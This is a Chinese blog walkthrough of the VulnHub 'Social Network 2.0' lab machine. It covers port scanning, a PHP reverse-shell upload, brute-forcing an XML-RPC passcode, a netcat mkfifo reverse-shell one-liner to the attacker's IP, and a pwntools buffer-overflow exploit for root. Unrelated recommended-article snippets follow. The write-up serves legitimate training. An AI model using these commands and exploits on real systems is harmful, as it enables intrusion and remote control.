social network 2.0

最新推荐文章于 2025-04-17 07:30:47 发布
最新推荐文章于 2025-04-17 07:30:47 发布
阅读量547 收藏 7
点赞数 7
文章标签: 网络安全 web安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yutianovo/article/details/136606152
版权

下载地址

https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/

信息搜集

nmap

nmap 192.168.31.251 -p-

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt

80

8000

在网页中注册一个账号

在此处上传一个以 php 结尾的文件用于反弹shell

文件位置为 /usr/share/webshells/php/php-reverse-shell.php

得到上传的路径

www-data

在 kali 开启监听

访问 9.php 得到 shell

传输文件到 kali

socent

monitor.py 移动至 socent

#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random

debugging_pass = random.randint(1000,9999)

def runcmd(cmd):
    results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    output = results.stdout.read() + results.stderr.read()
    return output

def cpu():
    return runcmd("cat /proc/cpuinfo")

def mem():
    return runcmd("free -m")

def disk():
    return runcmd("df -h")

def net():
    return runcmd("ip a")

def secure_cmd(cmd,passcode):
    if passcode==debugging_pass:
         return runcmd(cmd)
    else:
        return "Wrong passcode."

server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)

server.serve_forever()

根据以上服务端脚本内容,写出对服务端交互的脚本

➜  hard_socnet2 cat client.py 
from cgitb import reset
import re
from xmlrpclib import ServerProxy


s = ServerProxy("http://192.168.31.251:8000/")
result = s.net()
print(result)%                                                                                                           ➜  hard_socnet2 python2 client.py
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:61:30:92 brd ff:ff:ff:ff:ff:ff
    inet 192.168.31.251/24 brd 192.168.31.255 scope global dynamic ens33
       valid_lft 42834sec preferred_lft 42834sec
    inet6 fe80::20c:29ff:fe61:3092/64 scope link 
       valid_lft forever preferred_lft forever

测试发送数据成功

此时并不能任意执行命令,需要暴力破解随机数

from cgitb import reset
import re
from xmlrpclib import ServerProxy


for i in range(2000, 9999):
    s = ServerProxy("http://192.168.31.251:8000/")
    # result = s.secure_cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.134 5124 >/tmp/f", i)
    result = s.secure_cmd("whoami", i)
    if "Wrong passcode." in result:
        pass
    else:
        print(result)
        print(i)
        break

得到结果

from cgitb import reset
import re
from xmlrpclib import ServerProxy

s = ServerProxy("http://192.168.31.251:8000/")
i = 3635
result = s.secure_cmd("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.134 5124 >/tmp/f", i)

得到 shell

add_record 调试

经过模糊测试

当第三次运行且第三问为 1 时

在第四问输出超长的数据会导致缓冲区溢出

ida 反编译

后门函数 地址

在 ubuntu 中调试,写脚本测试成功

exp

from pwn import *
context.log_level = 'debug'

io = process("./add_record")

payload = b'A' * 58 + b'B' * 4 + p32(0x08048676)

io.recvline()
io.send(b"test\n")
io.recvline()
io.sendline("1")
io.sendline("1443")
io.send(b"1\n")
io.sendline(payload)
io.interactive()

靶机中

python -c "import struct; print('test\n11\n11\n1\n' + 'A'*62 + struct.pack('I', 0x08048676))" > payload
cat payload - | ./add_record

ROOT

赛博雨天
关注
Social Network Visualizer社交网络可视化,导入txt数据集
裕东方的博客
10-31 3976
前言 研一选了门《社交网络分析》课,要求用一种SNA工具实现一个数据集的分析。这里介绍一下Social Network Visualizer的基本使用方法Social Network Visualizer(SocNetV)是一种灵活且用户友好的工具,用于分析和可视化社交网络。它使用户可以在虚拟画布上单击几下来构建社交网络图,加载各种格式的网络(GraphViz,GraphML,Adjacency,Pajek,UCINET等),或通过爬网网页中的所有链接来创建网络。该应用程序可以计算网络的基本属.
VnlnHub BOREDHACKERBLOG SOCIAL NETWORK 2.0
weixin_45682839的博客
09-06 654
Vnlnhub BOREDHACKERBLOG SOCIAL NETWORK 2.0靶机过关攻略记录,设计知识包括:端口服务探测、sql注入、文件上传漏洞、linux本地提权、密码爆破、漏洞利用(python XMLRPC服务)、利用代码编写、gdb程序调试、缓冲区溢出漏洞利用等
Social Network Visualizer:社交网络分析和可视化软件-开源
04-29
请访问我们的新网站:http://socnetv.org Social Network Visualizer(SocNetV)是一种社交网络分析和可视化应用程序。 您可以绘制社交网络(图形/图)或加载现有的社交网络(GraphML,UCINET,Pajek等),计算凝聚力,中心性,社区和结构等效性指标,并基于演员中心性或声望得分应用各种布局算法(即特征向量,介于两者之间)或在动态模型上(例如,Kamada-Kawai弹簧嵌入器)
如何用 R 绘制交互式社会网络图?
玉树芝兰
03-25 4865
挖掘社会关系网络,助你洞若观火。需求最近有个学生问我,如何绘制交互式社会网络图(Interactive Social Network Graph)?之所以一定要交互式,是...
内网渗透思路学习——靶场实战——暗月项目七
qq_45612828的博客
08-17 8494
内网渗透思路学习——靶场实战——暗月项目七。学习一下内网渗透中的一些攻击思路和技巧(比如常见的横向、纵向渗透、代理穿透、提权、免杀等等)
SocNetV-3.0.4-7751bace-windows-installer.zip
01-18
Social Network Visualizer (SocNetV) is a cross-platform, user-friendly free software application for social network analysis and visualization. With SocNetV you can: Draw social networks with a few clicks on a virtual canvas, load your field data from a file in a supported format (GraphML, GraphViz, EdgeList, GML, Adjacency, Edgelist, Pajek, UCINET, etc.), automatically recreate famous data sets or crawl the internet to create a social network of connected webpages. Edit actors and ties through point-and-click, analyse graph and social network properties, produce beautiful HTML reports and embed visualization layouts to the network.
(vulhub靶机通关)BoredHackerBlog: Social Network 2.0---hard_socnet2
yang1234567898的博客
01-07 3725
靶机下载地址:BoredHackerBlog: Social Network 2.0 ~ VulnHub 最终只拿到了本地权限,root权限的提升涉及逆向工程、缓冲区溢出的源码审计,还在摸索 首先,必须保证靶机、kali是通过桥接模式在同一网段 主机发现: 打开kali,通过ifconfig查看主机网段 nmap扫描网段: nmap 192.168.43.0/24 找到靶机ip,开放了22、80、8000端口 获取webshell: 先访问80端口,是
social-network-2.0
03-20
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。您还将在控制台中看到任何棉绒...
social-network-ver2.0
04-01
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
Ajax-Laravel-5.3-and-Vue-js-2.0-social-network.zip
09-17
Ajax-Laravel-5.3-and-Vue-js-2.0-social-network.zip,使用Laravel 5.3和Vue JS 2.0构建的社交网络,ajax代表异步javascript和xml。它是多种web技术的集合,包括html、css、json、xml和javascript。它用于创建动态...
迷失的圆圈- Facebook图形可视化工具。「Lost Circles - Facebook Graph Visualizer」「Lost Circles - The Social Network Visualizer」「Lost Circles - Social Network」-crx插件
03-08
可视化你的facebook网络的隐藏结构。 更新:2.3.1:*修复了某些帐户仅显示前10个朋友的问题。 更新:2.3.0:*修复了Facebook和下载选项的问题。 扩展程序应重新工作。 *更改为财务服务器托管的付费扩展更新:2.2.7:*调整名称以解决商标问题更新:2.2.6:*修复了网络查看器的javascript错误更新:2.2.5:*修复了新的facebook用户界面的问题更新:2.2.2:*添加了Graphml导出(应与Gephi配合使用)更新:2.2.1:*修复了json导出问题。 更新:2.2.0:*单击节点立即打开用户的Facebook页面*确保您在Facebook中具有英语设置更新:2.1.9:*某些Facebook帐户已解决的问题*现在可以在数据存储时使用可视化和下载正在加载*添加了不包含用户图像的下载选项(减小了.json导出的文件大小)更新:2.1.8:*添加了主菜单中的下载按钮。 这样就可以下载大型网络,有些计算机只是为了缓慢浏览它们而无法看到它。 更新:2.1.7:*修复了对话框问题更新:2.1.6:*修复了主干功能,该功能不适用于某些用户。 ================= Lost Circles可以可视化并下载您的Facebook友谊网络。 一个由一百个或更多朋友组成的Facebook网络通常非常密集。 这是因为您的朋友通常是彼此的朋友,因此产生了大量的链接。 当可视化时,这样的网络看起来非常混乱,并且没有真实的结构:我们称其为毛球。 我们的应用程序可帮助您解开毛团,并在朋友之间显示隐藏的群组结构:您迷失的圈子。 我们通过确定链接的相对重要性来做到这一点,并让联系紧密的朋友更加紧密地联系在一起。 自己试试吧! 支持语言:English
react-social-network:简单的React社交网络
02-05
:warning: 我们不再开发该存储库。 遵循新版本。 Telar社交网络由以下人员组成: 使用ReactJS的。 在Kubernetes (公共云,私有云或本地)上运行的Telar Social 设计用于处理身份验证,通知,实时操作,文件存储和管理服务。 Telar Social Serverless处理帖子,评论,投票,社交社区和媒体服务。 免费 。 React Social Network是一个开源项目,它依赖强大的javascript库来构建用户界面。 在这个项目中,我试图将React / React组件的某些功能展示为一个社交网络。 该项目的结构使开发人员能够根据自己的想法和环境来开发
Social Network Visualization(社交关系图的可视化研究)
GookerLee的专栏
04-06 3341
This work is inspired from a paper: A maxent-stress model for graph layout IEEE transactions on visualization and computer graphics Gansner ER, Hu Y, North S link: http://yifanhu.net/PUB/max
Top 7大开源数据可视化分析工具!
copcejzra025085498的博客
11-12 2532
目前,我们可以在市场上找到很多用于网络分析和数据可视化的开源工具,例如NetworkX,R和Gephi中的iGraph包等。在所有工具中,Gephi一直以来被认为是最值得推荐的,它可以帮助用户轻松实现超过十万个节点的可视化。...
social network 学习心得
weixin_42235718的博客
04-09 2249
1. 文章摘要 这篇文章主要讲了社交网络从起源到发展再到未来的一系列技术和涉及到的研究与问题,从当今社会社交网络的普及切入,开始了一系列的调查研究。 通过研究理解人类的行为发现,人们往往会和自己相似的人成为朋友,这就是社交网络中体现出的朋友圈,在现代生活中,我们的好友列表基本都是身边的亲人朋友、同事等平时生活中频繁接触的人,也有一些很聊得来的在线网友,这些人往往因为有相同的兴趣爱好或者相似的三观...
python cgitb模块 脚本异常管理实例(tcy)
tcy-阿春
06-30 2589
cgitb 脚本异常管理 用途:如发生未捕获异常,将展示格式化输出报告。包括源代码每一层回溯,及当前执行程序参数和局部变量。 import cgitb 函数: cgitb.encable(display=1, logdir=None, context=5, format="html") 用途:报告显示在浏览器或文件;加到你的浏览器头部 参数:display:1发送至浏览器;0不发送 logdi...
社会网络可视化软件
xlvector的专栏
11-29 4765
图的可视化也是目前一个研究方向。关于社会网络的可视化,有很多软件,比如KrackPlot,Pajek等等。但似乎对中文支持的都不好。为此,我还得把中文换成汉语拼音,太麻烦了。于是决定写一个自己的可视化工具。可视化的核心就是一个Layout的问题,如何选择图顶点的坐标,让图看起来美观。我用了Qt做界面,算法用的梯度下降法。下面是我Layout出来的一些结果。感觉还行,嘿嘿。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8680
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全零基础培训 L1-3 Kali命令基础
最新发布
2401_86544210的博客
04-17 1225
Nmap(端口扫描器)Wireshark(数据包分析器)(应用于对无线局域网进行渗透测试的软件)(密码破解器)Nessus(很强大的漏洞扫描工具)OpenVAS(开源的漏洞扫描工具)Burp Suite(用于web应用安全测试的集成平台)SQLmap自动化的SQL注入工具wireshark网络协议分析工具(kali预装的这些软件包含了很多黑客会使用到的很多工具,但是不要用这些工具去私自攻击未授权的一些网站)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值